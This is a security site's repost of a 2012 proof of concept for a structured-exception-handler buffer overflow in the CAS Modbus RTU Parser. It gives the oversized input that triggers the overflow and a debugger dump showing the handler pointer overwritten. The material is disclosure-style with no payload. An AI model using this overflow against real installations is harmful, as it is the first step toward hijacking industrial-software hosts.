首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CAS Modbus RTU Parser Buffer Overflow SEH
来源:FaceBook : /SenatorofPiratesInfo 作者:Pirates 发布时间:2012-09-07  
Title : CAS Modbus RTU Parser Buffer Overflow SEH
Author : Senator of Pirates
Founder : Marshall Webb
Link Software :
http://www.chipkin.com/technical-resources/cas-modbus-rtu-parser/
FaceBook : /SenatorofPiratesInfo
Marshall's FaceBook : /lulznet
Date : 2012-09-07
Greets : USA & Morocco

PoC :
----

you should input a long string of A*40000 into poll message and
presson Analyze then SEH pointer is overwritten with 0x61616161 as you
can see below.

eax=00007531 ebx=00000000 ecx=0000099a edx=0012b138 esi=00f94f1c edi=00130000
eip=00408f79 esp=0012b118 ebp=0012f840 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
image00400000+0x8f79:
00408f79 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd esp
0012b118  0012fed4 0012fe08 0012f840 00000004
0012b128  5d5b0a0d 3a2c0920 7b29282e 003e3c7d
0012b138  61616161 61616161 61616161 61616161
0012b148  61616161 61616161 61616161 61616161
0012b158  61616161 61616161 61616161 61616161
0012b168  61616161 61616161 61616161 61616161
0012b178  61616161 61616161 61616161 61616161
0012b188  61616161 61616161 61616161 61616161

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TP-LINK TL-WR340G Denial Of Se
·Sflog! CMS 1.0 Arbitrary File
·Symantec Messaging Gateway 9.5
·ActiveFax (ActFax) 4.3 Client
·HP SiteScope Remote Code Execu
·mcrypt 2.6.8 Buffer Overflow P
·WAN Emulator v2.3 Command Exec
·JBoss DeploymentFileRepository
·Openfiler v2.x NetworkCard Com
·MobileCartly 1.0 Arbitrary Fil
·Oracle VM VirtualBox 4.1 Local
·SAP NetWeaver Dispatcher DiagT
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved